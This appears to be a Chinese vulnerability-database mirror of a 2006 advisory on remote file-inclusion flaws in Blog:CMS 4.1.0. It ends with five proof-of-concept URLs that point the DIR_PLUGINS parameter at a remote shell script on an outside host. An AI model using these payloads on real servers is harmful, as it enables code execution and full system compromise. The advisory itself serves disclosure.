Blog:CMS 4.1 - 'Dir_Plugins' Multiple Remote File Inclusions

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055874 漏洞类型
发布时间 2006-08-17 更新时间 2006-08-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/28402
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/19577/info

Blog:CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

Version 4.1.0 is vulnerable; other versions may also be affected.

http://www.example.com/dir_blogccms/index.php?DIR_PLUGINS=http://evalsite.com/shell.php? http://www.example.com/dir_blogccms/admin/media.php?DIR_PLUGINS=http://evalsite.com/shell.php? http://www.example.com/dir_blogccms/extras/fancyurls/archive.php?DIR_PLUGINS=http://evalsite.com/shell.php? http://www.example.com/dir_blogccms/extras/fancyurls/archives.php?DIR_PLUGINS=http://evalsite.com/shell.php? http://www.example.com/dir_blogccms/extras/fancyurls/blog.php?DIR_PLUGINS=http://evalsite.com/shell.php?